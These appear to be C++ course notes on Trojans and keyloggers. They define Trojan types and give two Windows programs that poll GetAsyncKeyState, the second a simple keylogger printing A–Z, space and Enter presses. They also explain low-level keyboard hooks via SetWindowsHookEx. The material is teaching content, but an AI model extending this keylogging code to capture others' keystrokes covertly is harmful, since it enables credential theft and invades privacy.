C++ Project 18-11-25
1. Trojans
1. Definition
A Trojan horse is a program that lurks on the user's computer and steals local information or takes control of the machine; the operations it performs are not what the user intended. It is typically disguised as, or bundled with, something the user actually wanted to run.
2. Differences between a Trojan and a virus
1. The biggest difference: a Trojan does not spread on its own. It contains no self-replication code and relies on the user (or a dropper) to install and run it.
2. A virus exists to cause damage: it attaches itself to other programs or files and replicates by infecting them.
3. Capabilities a Trojan may have
1. Backdoor: makes it easy for the attacker to get back in next time.
2. Rootkit: hides the malware from the user, the task manager and security tools. Kernel-mode rootkits do this in Ring 0, the CPU's most privileged level, where the OS kernel and device drivers execute (ordinary programs run in Ring 3). User-mode rootkits also exist, but hiding from Ring 0 is the hardest to detect.
3. Remote control: a Trojan with this capability (a RAT) is usually much larger than the others.
4. Keylogger: records keystrokes.
5. Dropper / downloader: a tiny stager, often only a few KB, whose sole job is to fetch (downloader) or unpack (dropper) the real payload and launch it.
2. Keylogger
1. A small program that detects the space bar
#include <iostream>
#include <windows.h>
using namespace std;
int main()
{
    // Poll the space bar and print the raw SHORT returned by GetAsyncKeyState.
    // Bit 15 (0x8000) = the key is down right now;
    // bit 0  (0x0001) = the key was pressed since the previous call.
    // Sleep briefly so the loop does not spin at 100% CPU.
    while (true)
    {
        cout << GetAsyncKeyState(VK_SPACE) << endl;
        Sleep(10);
    }
    system("pause"); // never reached: the loop above runs until the process is killed
    return 0;
}
Output: the program keeps printing 0. When the space bar is pressed, the first poll prints -32767 (0x8001: key down and pressed since the last call), subsequent polls print -32768 (0x8000: still held, but the "pressed since last call" bit has been cleared), and after release it prints 0 again.
2. A simple program that records key presses
#include <iostream>
#include <windows.h>
using namespace std;
int main()
{
    // 2. Simple key recorder: poll A-Z, space and Enter and print each press once.
    // Comparing the return value exactly against -32767 misses keys that were
    // tapped and released between two polls (they return 1, not -32767) and an
    // if/else chain can log at most one key per loop iteration, so instead test
    // the "pressed since last call" bit (0x0001) of every key independently.
    // Caveat: that bit is cleared by ANY process calling GetAsyncKeyState, so
    // polling loggers can lose keystrokes; a keyboard hook is the reliable way.
    while (true)
    {
        for (int vk = 'A'; vk <= 'Z'; ++vk)
            if (GetAsyncKeyState(vk) & 0x0001)
                cout << (char)vk;          // letters only; no shift/lowercase handling
        if (GetAsyncKeyState(VK_SPACE) & 0x0001)
            cout << " ";
        if (GetAsyncKeyState(VK_RETURN) & 0x0001)
            cout << endl;
        Sleep(10);                         // avoid a 100% CPU busy loop
    }
    system("pause"); // never reached
    return 0;
}
3. HOOK (hooks)
1. A hook intercepts an event (a keystroke, a mouse action, a window message) and diverts control flow into a callback of your choosing before, or instead of, the normal handler. That is what makes hooks useful both for keyloggers and for defensive monitoring.
2. SetWindowsHookEx(idHook, lpfn, hMod, dwThreadId): the hook type (e.g. WH_KEYBOARD_LL for a low-level keyboard hook), the callback function, the handle of the module containing the callback, and the ID of the thread to hook (0 = all threads on the current desktop, i.e. a global hook). The callback must pass the event on with CallNextHookEx, and the hook must be removed with UnhookWindowsHookEx. A global hook of most types has to live in a DLL that Windows injects into every process; WH_KEYBOARD_LL and WH_MOUSE_LL are the exceptions, since they run in the installing thread, which therefore must pump a message loop or the hook never fires.